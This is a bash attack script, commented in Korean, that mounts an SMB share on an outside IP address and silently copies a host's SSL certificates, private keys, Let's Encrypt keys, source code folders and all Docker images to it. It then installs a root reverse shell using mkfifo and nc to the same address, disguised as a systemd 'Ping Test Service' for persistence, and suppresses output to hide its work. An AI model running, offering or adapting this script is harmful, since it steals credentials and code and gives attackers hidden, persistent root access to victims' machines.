#!/usr/bin/bash

# 2-1 정보 탈취
# 공유폴더 연결
mkdir /mnt/share  > /dev/null 2>&1
sudo mount -t cifs //220.75.218.64/stolen /mnt/share -o username=hack,password=0000,vers=3.0,rw,file_mode=0777,dir_mode=0777,port=4446  > /dev/null 2>&1
# 인증서 탈취
sudo cp -r /etc/ssl/certs/ /mnt/share/certs/ > /dev/null 2>&1
sudo cp -r /etc/ssl/private/ /mnt/share/certs/ > /dev/null 2>&1
sudo cp -r /etc/letsencrypt/live/ /mnt/share/certs/ > /dev/null 2>&1
# 코드 탈취
sudo cp -r /home/tenable/projects/ /mnt/share/codes/  > /dev/null 2>&1
sudo cp -r /home/tenable/src/ /mnt/share/codes/ > /dev/null 2>&1
sudo cp -r /home/tenable/code/ /mnt/share/codes/ > /dev/null 2>&1
sudo cp -r /home/tenable/workspace/ /mnt/share/codes/ > /dev/null 2>&1
sudo cp -r /home/tenable/eclipse-workspace/ /mnt/share/codes/  > /dev/null 2>&1
sudo cp -r /home/tenable/IdeaProjects/ /mnt/share/codes/  > /dev/null 2>&1
sudo cp -r /home/tenable/AndroidStudioProjects/ /mnt/share/codes/  > /dev/null 2>&1
# 이미지 탈취
images=$(docker images --format "{{.Repository}}:{{.Tag}}")
if [ -z "$images" ]; then
  echo
  exit 1
fi

for image in $images; do
  safe_name=$(echo $image | tr '/:' '--')
  tar_file="${safe_name}.tar"
  docker save -o "$tar_file" "$image"
  cp "$tar_file" /mnt/share/docker 
  rm "$tar_file"
done
# 공유폴더 해제
sudo umount -l /mnt/share  > /dev/null 2>&1
sudo rm -r /mnt/share  > /dev/null 2>&1
# 백도어 생성
sudo tee /usr/bin/ping5.sh > /dev/null << 'EOF'
#!/bin/bash
sudo su -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 220.75.218.64 4444 > /tmp/f"
EOF

sudo chmod +x /usr/bin/ping5.sh  > /dev/null 2>&1
sudo tee /etc/systemd/system/ping.service > /dev/null << 'EOF'
[Unit]
Description=Ping Test Service
After=network.target

[Service]
Type=simple
ExecStart=/usr/bin/ping5.sh
User=root
Restart=no

[Install]
WantedBy=multi-user.target
EOF

sudo systemctl daemon-reload > /dev/null 2>&1
sudo systemctl enable ping.service > /dev/null 2>&1
sudo systemctl start ping.service > /dev/null 2>&1
